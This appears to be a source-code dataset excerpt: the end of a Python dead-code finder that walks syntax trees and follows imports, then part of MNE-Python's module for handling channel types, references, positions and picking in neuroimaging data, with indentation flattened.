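# hypothetical module name):
#   dirs = get_possible_import_paths()
#   path = find_module('kalman', dirs)
#   if path:
#       print('found', path)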
class Item(str):
def __new__(cls, name, typ, file, lineno, line):
item = str.__new__(cls, name)
item.typ = typ
item.file = file
item.lineno = lineno
item.line = line
return item
def file_lineno(item):
return (item.file.lower(), item.lineno)
class Vulture(ast.NodeVisitor):
"""Find dead stuff."""
def __init__(self, exclude=None, verbose=False, halt_on_main=False):
self.exclude = []
for pattern in exclude or []:
if not any(char in pattern for char in ['*', '?', '[']):
pattern = '*%s*' % pattern
self.exclude.append(pattern)
self.verbose = verbose
self.defined_funcs = []
self.used_funcs = []
self.defined_props = []
self.defined_attrs = []
self.used_attrs = []
self.defined_vars = []
self.used_vars = []
self.tuple_assign_vars = []
self.file = ''
self.code = None
# if halt_on_main then stop when we get to '__main__' == __name__
self.halt_on_main = halt_on_main
self.halt = False
self.in_main_file = True
self.module_dirs = get_possible_import_paths()
self.import_paths = []
def scan(self, node_string):
self.code = node_string.splitlines()
try:
node = ast.parse(node_string, filename=self.file)
except SyntaxError:
print()
print('Syntax error in file %s:' % self.file)
traceback.print_exc()
print()
return
self.visit(node)
def _get_modules(self, paths, toplevel=True):
"""Take files from the command line even if they don't end with .py."""
modules = []
for path in paths:
path = os.path.abspath(path)
if os.path.isfile(path) and (path.endswith('.py') or toplevel):
modules.append(path)
elif os.path.isdir(path):
subpaths = [os.path.join(path, filename)
for filename in sorted(os.listdir(path))]
modules.extend(self._get_modules(subpaths, toplevel=False))
elif toplevel:
print('Warning: %s could not be found.' % path)
return modules
def scavenge(self, paths):
modules = self._get_modules(paths)
self.included_modules = [] #!!
for module in modules:
if any(fnmatchcase(module, pattern) for pattern in self.exclude):
self.log('Excluded:', module)
continue
self.included_modules.append(module) #!!
for module in self.included_modules: #!!
self.log('Scanning:', module)
with open(module) as module_file:
module_string = module_file.read()
self.file = module
self.halt = False # reset halt_on_main testing for each file
self.scan(module_string)
# detect first file in list
self.in_main_file = False # first file is treated differently if halt_on_main is set
def report(self):
if self.import_paths:
print("Import paths:")
for p in self.import_paths:
print(" {}".format(p))
for item in sorted(self.unused_funcs + self.unused_props +
self.unused_vars + self.unused_attrs,
key=file_lineno):
#print(item.file)
#relpath = os.path.relpath(item.file)
#path = relpath if not relpath.startswith('..') else item.file
path = item.file
print("%s:%d: Unused %s '%s'" % (path, item.lineno, item.typ,
item))
def get_import_files(self):
return self.import_paths
def get_unused_references(self):
return sorted(self.unused_funcs + self.unused_props +
self.unused_vars + self.unused_attrs,
key=file_lineno)
def get_unused(self, defined, used):
return list(sorted(set(defined) - set(used), key=lambda x: x.lower()))
@property
def unused_funcs(self):
return self.get_unused(self.defined_funcs,
self.used_funcs + self.used_attrs)
@property
def unused_props(self):
return self.get_unused(self.defined_props, self.used_attrs)
@property
def unused_vars(self):
return self.get_unused(self.defined_vars,
self.used_vars + self.used_attrs + self.tuple_assign_vars)
@property
def unused_attrs(self):
return self.get_unused(self.defined_attrs, self.used_attrs)
def _get_lineno(self, node):
return getattr(node, 'lineno', 1)
def _get_line(self, node):
return self.code[self._get_lineno(node) - 1] if self.code else ""
def _get_item(self, node, typ):
name = getattr(node, 'name', None)
id = getattr(node, 'id', None)
attr = getattr(node, 'attr', None)
assert len([x for x in (name, id, attr) if x is not None]) == 1
return Item(name or id or attr, typ, self.file, node.lineno,
self._get_line(node))
def log(self, *args):
if self.verbose:
print(*args)
def print_node(self, node):
self.log(self._get_lineno(node), ast.dump(node), self._get_line(node))
def _get_func_name(self, func):
for field in func._fields:
if field == 'id':
return func.id
elif field == 'func':
return self._get_func_name(func.func)
return func.attr
def visit_FunctionDef(self, node):
for decorator in node.decorator_list:
if getattr(decorator, 'id', None) == 'property':
self.defined_props.append(self._get_item(node, 'property'))
break
else:
# Only executed if function is not a property.
if not (node.name.startswith('__') and node.name.endswith('__')):
self.defined_funcs.append(self._get_item(node, 'function'))
def visit_Attribute(self, node):
item = self._get_item(node, 'attribute')
if isinstance(node.ctx, ast.Store):
self.log('defined_attrs <-', item)
self.defined_attrs.append(item)
elif isinstance(node.ctx, ast.Load):
self.log('used_attrs <-', item)
self.used_attrs.append(item)
def visit_Name(self, node):
if node.id != 'object':
self.used_funcs.append(node.id)
if isinstance(node.ctx, ast.Load):
self.log('used_vars <-', node.id)
self.used_vars.append(node.id)
elif isinstance(node.ctx, ast.Store):
# Ignore _x (pylint convention), __x, __x__ (special method).
if not node.id.startswith('_'):
item = self._get_item(node, 'variable')
self.log('defined_vars <-', item)
self.defined_vars.append(item)
def _find_tuple_assigns(self, node):
# Find all tuple assignments. Those have the form
# Assign->Tuple->Name or For->Tuple->Name or comprehension->Tuple->Name
for child in ast.iter_child_nodes(node):
if not isinstance(child, ast.Tuple):
continue
for grandchild in ast.walk(child):
if (isinstance(grandchild, ast.Name) and
isinstance(grandchild.ctx, ast.Store)):
self.log('tuple_assign_vars <-', grandchild.id)
self.tuple_assign_vars.append(grandchild.id)
def visit_Assign(self, node):
self._find_tuple_assigns(node)
def visit_For(self, node):
self._find_tuple_assigns(node)
def visit_comprehension(self, node):
self._find_tuple_assigns(node)
def visit_ClassDef(self, node):
self.defined_funcs.append(self._get_item(node, 'class'))
def visit_Str(self, node):
"""Variables may appear in format strings: '%(a)s' % locals()"""
self.used_vars.extend(FORMAT_STRING_PATTERN.findall(node.s))
# tests for __name__ == '__main__' if halt_on_main flag is set
def visit_If(self, node): #!!
" stop processing when find '__main__' test in if statement "
if (not self.in_main_file) and self.halt_on_main:
data = ast.dump(node)
if data.find('__name__') > 0 and data.find('__main__') > 0:
#stop processing
self.halt = True
def visit_Import(self, node):
import_assoc = []
#print ('### import node')
data = ast.dump(node)
#print(data.split())
names = data.split('names=')[1].split()
i = 1
#print(names)
for x in names:
for y in x.split('='):
i = 1-i
element = y.strip("',[]()")
#print(element)
if i == 0:
#aliaspos = element.find('(') # only really need name
#if aliaspos > -1:
# element = element[aliaspos+1:]
import_assoc.append([element])
else:
import_assoc[-1].append(element)
#print(import_assoc)
# add each discovered module path to the scan list and import list
for i in range(0, len(import_assoc), 2): # always pairs
name = import_assoc[i][1]
asname = import_assoc[i+1][1]
if asname:
print("Found import {} as {}".format(name, asname))
else:
print("Found import {}".format(name))
# check path exists
path = find_module(name, self.module_dirs)
if path and os.path.exists(path):
print(" importing")
if path not in self.included_modules:
self.included_modules.append(path)
self.import_paths.append(path)
#print("###", len(self.included_modules),self.included_modules)
### examples
#Import(names=[alias(name='kalman', asname=None), alias(name='bit_manipulation', asname=None)])
#Import(names=[alias(name='bits', asname='bb')])
def visit(self, node):
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method, None)
if not self.halt: # only set if halt_on_main flag is set
if visitor is not None:
if self.verbose:
self.print_node(node)
visitor(node)
self.generic_visit(node)
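# Illustrative use of Vulture (a sketch; the paths and exclude pattern are
# placeholders):
#   v = Vulture(exclude=['test_*'], verbose=False, halt_on_main=True)
#   v.scavenge(['wake.py'])
#   v.report()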
|
Neon22/python-flavin
|
wake.py
|
Python
|
gpl-2.0
| 12,499
|
[
"VisIt"
] |
07013272181068533c7bc48c9ee20cbf190638ce4b22cdd12e37baa338db3fb0
|
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Matti Hämäläinen <msh@nmr.mgh.harvard.edu>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
# Daniel McCloy <dan.mccloy@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
import sys
from collections import OrderedDict
from copy import deepcopy
from functools import partial
import numpy as np
from scipy import sparse
from ..defaults import HEAD_SIZE_DEFAULT, _handle_default
from ..utils import (verbose, logger, warn, _check_preload, _validate_type,
fill_doc, _check_option)
from ..io.compensator import get_current_comp
from ..io.constants import FIFF
from ..io.meas_info import anonymize_info, Info, MontageMixin, create_info
from ..io.pick import (channel_type, pick_info, pick_types, _picks_by_type,
_check_excludes_includes, _contains_ch_type,
channel_indices_by_type, pick_channels, _picks_to_idx,
_get_channel_types)
from ..io.write import DATE_NONE
def _get_meg_system(info):
"""Educated guess for the helmet type based on channels."""
have_helmet = True
for ch in info['chs']:
if ch['kind'] == FIFF.FIFFV_MEG_CH:
# Only take first 16 bits, as higher bits store CTF grad comp order
coil_type = ch['coil_type'] & 0xFFFF
if coil_type == FIFF.FIFFV_COIL_NM_122:
system = '122m'
break
elif coil_type // 1000 == 3: # All Vectorview coils are 30xx
system = '306m'
break
elif (coil_type == FIFF.FIFFV_COIL_MAGNES_MAG or
coil_type == FIFF.FIFFV_COIL_MAGNES_GRAD):
nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
for c in info['chs']])
system = 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
break
elif coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
system = 'CTF_275'
break
elif coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
system = 'KIT'
break
elif coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
system = 'BabySQUID'
break
elif coil_type == FIFF.FIFFV_COIL_ARTEMIS123_GRAD:
system = 'ARTEMIS123'
have_helmet = False
break
else:
system = 'unknown'
have_helmet = False
return system, have_helmet
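# Masking illustration (a sketch): a CTF gradiometer coil_type carrying a
# compensation order in its upper bits still maps back to the base coil code:
#   ((0x1 << 16) | FIFF.FIFFV_COIL_CTF_GRAD) & 0xFFFF == FIFF.FIFFV_COIL_CTF_GRAD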
def _get_ch_type(inst, ch_type, allow_ref_meg=False):
"""Choose a single channel type (usually for plotting).
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
allowed_types = ['mag', 'grad', 'planar1', 'planar2', 'eeg', 'csd',
'fnirs_cw_amplitude', 'fnirs_od', 'hbo', 'hbr',
'ecog', 'seeg']
allowed_types += ['ref_meg'] if allow_ref_meg else []
for type_ in allowed_types:
if isinstance(inst, Info):
if _contains_ch_type(inst, type_):
ch_type = type_
break
elif type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(instances, copy=True, verbose=None):
"""Equalize channel picks and ordering across multiple MNE-Python objects.
First, all channels that are not common to each object are dropped. Then,
using the first object in the list as a template, the channels of each
object are re-ordered to match the template. The end result is that all
given objects define the same channels, in the same order.
Parameters
----------
instances : list
A list of MNE-Python objects to equalize the channels for. Objects can
be of type Raw, Epochs, Evoked, AverageTFR, Forward, Covariance,
CrossSpectralDensity or Info.
copy : bool
When dropping and/or re-ordering channels, an object will be copied
when this parameter is set to ``True`` (the default). When set to
``False``, the dropping and re-ordering of channels happens in-place.
.. versionadded:: 0.20.0
%(verbose)s
Returns
-------
equalized_instances : list
A list of MNE-Python objects that have the same channels defined in the
same order.
Notes
-----
When ``copy=False``, this function operates in-place.
"""
from ..cov import Covariance
from ..io.base import BaseRaw
from ..io.meas_info import Info
from ..epochs import BaseEpochs
from ..evoked import Evoked
from ..forward import Forward
from ..time_frequency import _BaseTFR, CrossSpectralDensity
# Instances need to have a `ch_names` attribute and a `pick_channels`
# method that supports `ordered=True`.
allowed_types = (BaseRaw, BaseEpochs, Evoked, _BaseTFR, Forward,
Covariance, CrossSpectralDensity, Info)
allowed_types_str = ("Raw, Epochs, Evoked, TFR, Forward, Covariance, "
"CrossSpectralDensity or Info")
for inst in instances:
_validate_type(inst, allowed_types, "Instances to be modified",
allowed_types_str)
chan_template = instances[0].ch_names
logger.info('Identifying common channels ...')
channels = [set(inst.ch_names) for inst in instances]
common_channels = set(chan_template).intersection(*channels)
all_channels = set(chan_template).union(*channels)
dropped = list(set(all_channels - common_channels))
# Preserve the order of chan_template
order = np.argsort([chan_template.index(ch) for ch in common_channels])
common_channels = np.array(list(common_channels))[order].tolist()
# Update all instances to match the common_channels list
reordered = False
equalized_instances = []
for inst in instances:
# Only perform picking when needed
if inst.ch_names != common_channels:
if copy:
inst = inst.copy()
inst.pick_channels(common_channels, ordered=True)
if len(inst.ch_names) == len(common_channels):
reordered = True
equalized_instances.append(inst)
if dropped:
logger.info('Dropped the following channels:\n%s' % dropped)
elif reordered:
logger.info('Channels have been re-ordered.')
return equalized_instances
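# Illustrative call (a sketch; `raw` and `epochs` stand for any two
# MNE-Python objects with overlapping channel sets):
#   raw_eq, epochs_eq = equalize_channels([raw, epochs], copy=True)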
class ContainsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
def __contains__(self, ch_type):
"""Check channel type membership.
Parameters
----------
ch_type : str
Channel type to check for. Can be e.g. 'meg', 'eeg', 'stim', etc.
Returns
-------
in : bool
Whether or not the instance contains the given channel type.
Examples
--------
Channel type membership can be tested as::
>>> 'meg' in inst # doctest: +SKIP
True
>>> 'seeg' in inst # doctest: +SKIP
False
"""
if ch_type == 'meg':
has_ch_type = (_contains_ch_type(self.info, 'mag') or
_contains_ch_type(self.info, 'grad'))
else:
has_ch_type = _contains_ch_type(self.info, ch_type)
return has_ch_type
@property
def compensation_grade(self):
"""The current gradient compensation grade."""
return get_current_comp(self.info)
@fill_doc
def get_channel_types(self, picks=None, unique=False, only_data_chs=False):
"""Get a list of channel type for each channel.
Parameters
----------
%(picks_all)s
unique : bool
Whether to return only unique channel types. Default is ``False``.
only_data_chs : bool
Whether to ignore non-data channels. Default is ``False``.
Returns
-------
channel_types : list
The channel types.
"""
return _get_channel_types(self.info, picks=picks, unique=unique,
only_data_chs=only_data_chs)
# XXX Eventually de-duplicate with _kind_dict of mne/io/meas_info.py
_human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
'eeg': FIFF.FIFFV_EEG_CH,
'emg': FIFF.FIFFV_EMG_CH,
'eog': FIFF.FIFFV_EOG_CH,
'exci': FIFF.FIFFV_EXCI_CH,
'ias': FIFF.FIFFV_IAS_CH,
'misc': FIFF.FIFFV_MISC_CH,
'resp': FIFF.FIFFV_RESP_CH,
'seeg': FIFF.FIFFV_SEEG_CH,
'stim': FIFF.FIFFV_STIM_CH,
'syst': FIFF.FIFFV_SYST_CH,
'bio': FIFF.FIFFV_BIO_CH,
'ecog': FIFF.FIFFV_ECOG_CH,
'fnirs_cw_amplitude': FIFF.FIFFV_FNIRS_CH,
'fnirs_od': FIFF.FIFFV_FNIRS_CH,
'hbo': FIFF.FIFFV_FNIRS_CH,
'hbr': FIFF.FIFFV_FNIRS_CH}
_human2unit = {'ecg': FIFF.FIFF_UNIT_V,
'eeg': FIFF.FIFF_UNIT_V,
'emg': FIFF.FIFF_UNIT_V,
'eog': FIFF.FIFF_UNIT_V,
'exci': FIFF.FIFF_UNIT_NONE,
'ias': FIFF.FIFF_UNIT_NONE,
'misc': FIFF.FIFF_UNIT_V,
'resp': FIFF.FIFF_UNIT_NONE,
'seeg': FIFF.FIFF_UNIT_V,
'stim': FIFF.FIFF_UNIT_NONE,
'syst': FIFF.FIFF_UNIT_NONE,
'bio': FIFF.FIFF_UNIT_V,
'ecog': FIFF.FIFF_UNIT_V,
'fnirs_cw_amplitude': FIFF.FIFF_UNIT_V,
'fnirs_od': FIFF.FIFF_UNIT_NONE,
'hbo': FIFF.FIFF_UNIT_MOL,
'hbr': FIFF.FIFF_UNIT_MOL}
_unit2human = {FIFF.FIFF_UNIT_V: 'V',
FIFF.FIFF_UNIT_T: 'T',
FIFF.FIFF_UNIT_T_M: 'T/m',
FIFF.FIFF_UNIT_MOL: 'M',
FIFF.FIFF_UNIT_NONE: 'NA',
FIFF.FIFF_UNIT_CEL: 'C'}
def _check_set(ch, projs, ch_type):
"""Ensure type change is compatible with projectors."""
new_kind = _human2fiff[ch_type]
if ch['kind'] != new_kind:
for proj in projs:
if ch['ch_name'] in proj['data']['col_names']:
raise RuntimeError('Cannot change channel type for channel %s '
'in projector "%s"'
% (ch['ch_name'], proj['desc']))
ch['kind'] = new_kind
class SetChannelsMixin(MontageMixin):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def set_eeg_reference(self, ref_channels='average', projection=False,
ch_type='auto', verbose=None):
"""Specify which reference to use for EEG data.
Use this function to explicitly specify the desired reference for EEG.
This can be either an existing electrode or a new virtual channel.
This function will re-reference the data according to the desired
reference.
Parameters
----------
ref_channels : list of str | str
The name(s) of the channel(s) used to construct the reference. To
apply an average reference, specify ``'average'`` here (default).
If an empty list is specified, the data is assumed to already have
a proper reference and MNE will not attempt any re-referencing of
the data. Defaults to an average reference.
projection : bool
If ``ref_channels='average'`` this argument specifies if the
average reference should be computed as a projection (True) or not
(False; default). If ``projection=True``, the average reference is
added as a projection and is not applied to the data (it can be
applied afterwards with the ``apply_proj`` method). If
``projection=False``, the average reference is directly applied to
the data. If ``ref_channels`` is not ``'average'``, ``projection``
must be set to ``False`` (the default in this case).
ch_type : 'auto' | 'eeg' | 'ecog' | 'seeg'
The name of the channel type to apply the reference to. If 'auto',
the first channel type of eeg, ecog or seeg that is found (in that
order) will be selected.
.. versionadded:: 0.19
%(verbose_meth)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'``
and ``projection=True`` a projection will be added instead of
directly re-referencing the data.
%(set_eeg_reference_see_also_notes)s
"""
from ..io.reference import set_eeg_reference
return set_eeg_reference(self, ref_channels=ref_channels, copy=False,
projection=projection, ch_type=ch_type)[0]
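    # Usage sketch (hedged; ``raw`` is a hypothetical preloaded Raw instance)::
    #
    #     >>> raw.set_eeg_reference('average', projection=True)  # doctest: +SKIP
    #     >>> raw.apply_proj()  # doctest: +SKIP
    #
    # With ``projection=True`` the average reference is only stored as a
    # projector; the data are modified once ``apply_proj`` is called.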
def _get_channel_positions(self, picks=None):
"""Get channel locations from info.
Parameters
----------
picks : str | list | slice | None
None gets good data indices.
Notes
-----
.. versionadded:: 0.9.0
"""
picks = _picks_to_idx(self.info, picks)
chs = self.info['chs']
pos = np.array([chs[k]['loc'][:3] for k in picks])
n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
if n_zero > 1: # XXX some systems have origin (0, 0, 0)
raise ValueError('Could not extract channel positions for '
'{} channels'.format(n_zero))
return pos
def _set_channel_positions(self, pos, names):
"""Update channel locations in info.
Parameters
----------
pos : array-like | np.ndarray, shape (n_points, 3)
The channel positions to be set.
names : list of str
The names of the channels to be set.
Notes
-----
.. versionadded:: 0.9.0
"""
if len(pos) != len(names):
raise ValueError('Number of channel positions not equal to '
'the number of names given.')
pos = np.asarray(pos, dtype=np.float64)
if pos.shape[-1] != 3 or pos.ndim != 2:
msg = ('Channel positions must have the shape (n_points, 3) '
'not %s.' % (pos.shape,))
raise ValueError(msg)
for name, p in zip(names, pos):
if name in self.ch_names:
idx = self.ch_names.index(name)
self.info['chs'][idx]['loc'][:3] = p
else:
msg = ('%s was not found in the info. Cannot be updated.'
% name)
raise ValueError(msg)
@verbose
def set_channel_types(self, mapping, verbose=None):
"""Define the sensor type of channels.
Parameters
----------
mapping : dict
A dictionary mapping a channel to a sensor type (str), e.g.,
``{'EEG061': 'eog'}``.
%(verbose_meth)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
The instance (modified in place).
.. versionchanged:: 0.20
Return the instance.
Notes
-----
The following sensor types are accepted:
ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst, ecog,
hbo, hbr, fnirs_cw_amplitude, fnirs_od
.. versionadded:: 0.9.0
"""
ch_names = self.info['ch_names']
# first check and assemble clean mappings of index and name
unit_changes = dict()
for ch_name, ch_type in mapping.items():
if ch_name not in ch_names:
raise ValueError("This channel name (%s) doesn't exist in "
"info." % ch_name)
c_ind = ch_names.index(ch_name)
if ch_type not in _human2fiff:
raise ValueError('This function cannot change to this '
'channel type: %s. Accepted channel types '
'are %s.'
% (ch_type,
", ".join(sorted(_human2unit.keys()))))
# Set sensor type
_check_set(self.info['chs'][c_ind], self.info['projs'], ch_type)
unit_old = self.info['chs'][c_ind]['unit']
unit_new = _human2unit[ch_type]
if unit_old not in _unit2human:
raise ValueError("Channel '%s' has unknown unit (%s). Please "
"fix the measurement info of your data."
% (ch_name, unit_old))
if unit_old != _human2unit[ch_type]:
this_change = (_unit2human[unit_old], _unit2human[unit_new])
if this_change not in unit_changes:
unit_changes[this_change] = list()
unit_changes[this_change].append(ch_name)
self.info['chs'][c_ind]['unit'] = _human2unit[ch_type]
if ch_type in ['eeg', 'seeg', 'ecog']:
coil_type = FIFF.FIFFV_COIL_EEG
elif ch_type == 'hbo':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBO
elif ch_type == 'hbr':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBR
elif ch_type == 'fnirs_cw_amplitude':
coil_type = FIFF.FIFFV_COIL_FNIRS_CW_AMPLITUDE
elif ch_type == 'fnirs_od':
coil_type = FIFF.FIFFV_COIL_FNIRS_OD
else:
coil_type = FIFF.FIFFV_COIL_NONE
self.info['chs'][c_ind]['coil_type'] = coil_type
msg = "The unit for channel(s) {0} has changed from {1} to {2}."
for this_change, names in unit_changes.items():
warn(msg.format(", ".join(sorted(names)), *this_change))
return self
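    # Usage sketch for ``set_channel_types`` (channel names are hypothetical)::
    #
    #     >>> raw.set_channel_types({'EEG 061': 'eog', 'EEG 062': 'ecg'})  # doctest: +SKIP
    #
    # Units and coil types are updated to match the new sensor type, and a
    # warning is emitted for each unit change.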
@fill_doc
def rename_channels(self, mapping):
"""Rename channels.
Parameters
----------
%(rename_channels_mapping)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
The instance (modified in place).
.. versionchanged:: 0.20
Return the instance.
Notes
-----
.. versionadded:: 0.9.0
"""
rename_channels(self.info, mapping)
return self
@verbose
def plot_sensors(self, kind='topomap', ch_type=None, title=None,
show_names=False, ch_groups=None, to_sphere=True,
axes=None, block=False, show=True, sphere=None,
verbose=None):
"""Plot sensor positions.
Parameters
----------
kind : str
Whether to plot the sensors as 3d, topomap or as an interactive
sensor selection dialog. Available options 'topomap', '3d',
'select'. If 'select', a set of channels can be selected
interactively by using lasso selector or clicking while holding
control key. The selected channels are returned along with the
figure instance. Defaults to 'topomap'.
ch_type : None | str
The channel type to plot. Available options 'mag', 'grad', 'eeg',
'seeg', 'ecog', 'all'. If ``'all'``, all the available mag, grad,
eeg, seeg and ecog channels are plotted. If None (default), then
channels are chosen in the order given above.
title : str | None
Title for the figure. If None (default), equals to ``'Sensor
positions (%%s)' %% ch_type``.
show_names : bool | array of str
Whether to display all channel names. If an array, only the channel
names in the array are shown. Defaults to False.
ch_groups : 'position' | array of shape (n_ch_groups, n_picks) | None
Channel groups for coloring the sensors. If None (default), default
coloring scheme is used. If 'position', the sensors are divided
into 8 regions. See ``order`` kwarg of :func:`mne.viz.plot_raw`. If
array, the channels are divided by picks given in the array.
.. versionadded:: 0.13.0
to_sphere : bool
Whether to project the 3d locations to a sphere. When False, the
            sensor array appears as if viewed from directly above the
            subject's head. Has no effect when kind='3d'. Defaults to True.
.. versionadded:: 0.14.0
axes : instance of Axes | instance of Axes3D | None
Axes to draw the sensors to. If ``kind='3d'``, axes must be an
instance of Axes3D. If None (default), a new axes will be created.
.. versionadded:: 0.13.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False.
.. versionadded:: 0.13.0
show : bool
Show figure if True. Defaults to True.
%(topomap_sphere_auto)s
%(verbose_meth)s
Returns
-------
fig : instance of Figure
Figure containing the sensor topography.
selection : list
A list of selected channels. Only returned if ``kind=='select'``.
See Also
--------
mne.viz.plot_layout
Notes
-----
This function plots the sensor locations from the info structure using
matplotlib. For drawing the sensors using mayavi see
:func:`mne.viz.plot_alignment`.
.. versionadded:: 0.12.0
"""
from ..viz.utils import plot_sensors
return plot_sensors(self.info, kind=kind, ch_type=ch_type, title=title,
show_names=show_names, ch_groups=ch_groups,
to_sphere=to_sphere, axes=axes, block=block,
show=show, sphere=sphere, verbose=verbose)
@verbose
def anonymize(self, daysback=None, keep_his=False, verbose=None):
"""Anonymize measurement information in place.
Parameters
----------
%(anonymize_info_parameters)s
%(verbose)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
The modified instance.
Notes
-----
%(anonymize_info_notes)s
.. versionadded:: 0.13.0
"""
anonymize_info(self.info, daysback=daysback, keep_his=keep_his,
verbose=verbose)
self.set_meas_date(self.info['meas_date']) # unify annot update
return self
def set_meas_date(self, meas_date):
"""Set the measurement start date.
Parameters
----------
meas_date : datetime | float | tuple | None
The new measurement date.
If datetime object, it must be timezone-aware and in UTC.
A tuple of (seconds, microseconds) or float (alias for
``(meas_date, 0)``) can also be passed and a datetime
object will be automatically created. If None, will remove
the time reference.
Returns
-------
inst : instance of Raw | Epochs | Evoked
The modified raw instance. Operates in place.
See Also
--------
mne.io.Raw.anonymize
Notes
-----
If you want to remove all time references in the file, call
:func:`mne.io.anonymize_info(inst.info) <mne.io.anonymize_info>`
after calling ``inst.set_meas_date(None)``.
.. versionadded:: 0.20
"""
from ..annotations import _handle_meas_date
meas_date = _handle_meas_date(meas_date)
self.info['meas_date'] = meas_date
# clear file_id and meas_id if needed
if meas_date is None:
for key in ('file_id', 'meas_id'):
value = self.info.get(key)
if value is not None:
assert 'msecs' not in value
value['secs'] = DATE_NONE[0]
value['usecs'] = DATE_NONE[1]
# The following copy is needed for a test CTF dataset
# otherwise value['machid'][:] = 0 would suffice
_tmp = value['machid'].copy()
_tmp[:] = 0
value['machid'] = _tmp
if hasattr(self, 'annotations'):
self.annotations._orig_time = meas_date
return self
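    # Usage sketch for ``set_meas_date`` (the datetime must be timezone-aware
    # and in UTC)::
    #
    #     >>> from datetime import datetime, timezone  # doctest: +SKIP
    #     >>> raw.set_meas_date(datetime(2020, 1, 1, tzinfo=timezone.utc))  # doctest: +SKIP
    #     >>> raw.set_meas_date(None)  # remove the time reference  # doctest: +SKIP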
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR."""
@verbose
def pick_types(self, meg=None, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, dipole=False, gof=False, bio=False, ecog=False,
fnirs=False, csd=False, include=(), exclude='bads',
selection=None, verbose=None):
"""Pick some channels by type and names.
Parameters
----------
meg : bool | str
If True include MEG channels. If string it can be 'mag', 'grad',
'planar1' or 'planar2' to select only magnetometers, all
gradiometers, or a specific type of gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg : bool | str
If True include CTF / 4D reference channels. If 'auto', reference
channels are included if compensations are present and ``meg`` is
not False. Can also be the string options for the ``meg``
parameter.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
            Flux excitation channels (these used to be stimulus channels).
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can
be 'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
csd : bool
EEG-CSD channels.
include : list of str
List of additional channels to include. If empty do not include
any.
exclude : list of str | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of str
Restrict sensor channels (MEG, EEG) to this list of channel names.
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, dipole=dipole, gof=gof, bio=bio,
ecog=ecog, fnirs=fnirs, include=include, exclude=exclude,
selection=selection)
self._pick_drop_channels(idx)
# remove dropped channel types from reject and flat
if getattr(self, 'reject', None) is not None:
# use list(self.reject) to avoid RuntimeError for changing
# dictionary size during iteration
for ch_type in list(self.reject):
if ch_type not in self:
del self.reject[ch_type]
if getattr(self, 'flat', None) is not None:
for ch_type in list(self.flat):
if ch_type not in self:
del self.flat[ch_type]
return self
def pick_channels(self, ch_names, ordered=False):
"""Pick some channels.
Parameters
----------
ch_names : list
The list of channels to select.
ordered : bool
If True (default False), ensure that the order of the channels in
the modified instance matches the order of ``ch_names``.
.. versionadded:: 0.20.0
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
reorder_channels
Notes
-----
        The channel names given are assumed to be a set, i.e. the order
        does not matter; the original order of the channels is preserved
        unless ``ordered=True``. You can also use ``reorder_channels`` to
        set the channel order explicitly.
.. versionadded:: 0.9.0
"""
picks = pick_channels(self.info['ch_names'], ch_names, ordered=ordered)
return self._pick_drop_channels(picks)
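    # Usage sketch contrasting the two ``ordered`` behaviours (channel names
    # are hypothetical)::
    #
    #     >>> raw.pick_channels(['EEG 001', 'MEG 0111'])  # original order kept  # doctest: +SKIP
    #     >>> raw.pick_channels(['EEG 001', 'MEG 0111'], ordered=True)  # doctest: +SKIP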
@fill_doc
def pick(self, picks, exclude=()):
"""Pick a subset of channels.
Parameters
----------
%(picks_all)s
exclude : list | str
Set of channels to exclude, only used when picking based on
types (e.g., exclude="bads" when picks="meg").
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
"""
picks = _picks_to_idx(self.info, picks, 'all', exclude,
allow_empty=False)
